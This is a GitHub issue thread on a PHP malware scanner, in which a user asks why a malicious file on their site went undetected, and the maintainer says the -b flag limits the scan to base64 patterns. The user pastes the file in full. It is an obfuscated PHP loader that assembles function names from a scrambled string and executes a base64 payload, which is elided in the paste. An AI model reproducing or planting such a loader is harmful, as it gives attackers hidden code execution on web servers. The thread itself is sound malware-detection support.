scr34m / php-malware-scanner

Scans PHP files for malwares and known threats
GNU General Public License v3.0
556 stars, 96 forks

Base64 - long weird string - not detected in a file years.php at the root of the web folder of the domain #85

Closed progz closed 1 year ago

progz commented 1 year ago

Hello,

First, thanks for your work, it's very useful.

I'm trying to understand why php-malware-scanner does not find that file when I run a scan. php-malware-scanner is up-to-date.

server:/usr/local/bin/php-malware-scanner# cat /var/www/xXxXxXxXxX.org/years.php 
<?php $cdFUXoVtM='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$cdFUXoVtM[(105/15)].$cdFUXoVtM[(26-1)].$cdFUXoVtM[(1*49)].$cdFUXoVtM[((10*1)+18)].$cdFUXoVtM[(14+22)].$cdFUXoVtM[(44+5)].$cdFUXoVtM[(44-13)].$cdFUXoVtM[(684/18)].$cdFUXoVtM[(23+4)].$cdFUXoVtM[(72-(33-7))].$cdFUXoVtM[(154/22)].$cdFUXoVtM[(11+25)].$cdFUXoVtM[(65-(62-31))].$cdFUXoVtM[(26-6)].$cdFUXoVtM[((27*2)-8)];$pHFdNhg9688=$cdFUXoVtM[(20-9)].$cdFUXoVtM[(2*4)].$cdFUXoVtM[(29*1)].$cdFUXoVtM[(160/4)];$MYtraky2482=$cdFUXoVtM[(8*5)].$cdFUXoVtM[((1+0)+2)].$cdFUXoVtM[(6+(1*(95/19)))].$cdFUXoVtM[(140/5)].$cdFUXoVtM[(522/18)].$cdFUXoVtM[(7*((7-3)-2))].$cdFUXoVtM[(2*14)].$cdFUXoVtM[(138/(2+4))].$cdFUXoVtM[(1029/(378/18))].$cdFUXoVtM[((2*189)/9)].$cdFUXoVtM[(12+(0+0))].$cdFUXoVtM[(31*1)].$cdFUXoVtM[(48/(36/12))].$cdFUXoVtM[(735/15)].$cdFUXoVtM[(0+7)].$cdFUXoVtM[(18+2)].$cdFUXoVtM[(18-(10/5))].$cdFUXoVtM[(735/15)].$cdFUXoVtM[(0+(2-(1*1)))].$cdFUXoVtM[(16-(3+(36/(0+18))))].$cdFUXoVtM[((167-23)/18)].$cdFUXoVtM[(0+(18-9))].$cdFUXoVtM[(1*3)].$cdFUXoVtM[(11*(1+(0/(78/13))))].$cdFUXoVtM[(2*7)].$cdFUXoVtM[(29*(0+1))].$cdFUXoVtM[(38-(8+9))].$cdFUXoVtM[(15*2)].$cdFUXoVtM[(45-11)].$cdFUXoVtM[(1*46)].$cdFUXoVtM[(1*(17+21))].$cdFUXoVtM[(78/3)].$cdFUXoVtM[(21+(77/11))].$cdFUXoVtM[(22+14)].$cdFUXoVtM[(343/(91/13))].$cdFUXoVtM[(1*1)].$cdFUXoVtM[(21-10)].$cdFUXoVtM[(22+(12/2))].$cdFUXoVtM[(180/20)].$cdFUXoVtM[(3+((0+0)*1))].$cdFUXoVtM[(686/(126/9))].$cdFUXoVtM[(61-(32-8))].$cdFUXoVtM[(476/17)].$cdFUXoVtM[((4-0)+22)].$cdFUXoVtM[(((23-(2*5))/13)-0)].$cdFUXoVtM[(7+(84/21))].$cdFUXoVtM[(28/2)].$cdFUXoVtM[(9-0)].$cdFUXoVtM[(3*1)];$UrR1094= "'[long base64 string elided]'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>

Any insight?

server5:/usr/local/bin/php-malware-scanner# php scan.php -d /var/www/xXxXxXxXxX.org/ -k -w -b -m -x -c -L -p -j 6.1.1
Combined whitelist records count: 88134
# ER 3958870d4cd3e8acf601043cdbc58b0c # {/var/www/xXxXxXxXxX.org/wp-content/themes/Divi/includes/builder/framework.php} #ZpbG # file # 20

Thanks a lot, if you have any clue :)

Best regards, Mr P.

scr34m commented 1 year ago

When you use the -b flag then it scans only for specified keys. These patterns sit in the base64_patterns directory. I think it's better to always run first without the -b flag and then, if there is no match, try with that one.

progz commented 1 year ago

Indeed, it's way better when I remove -b

Thanks a lot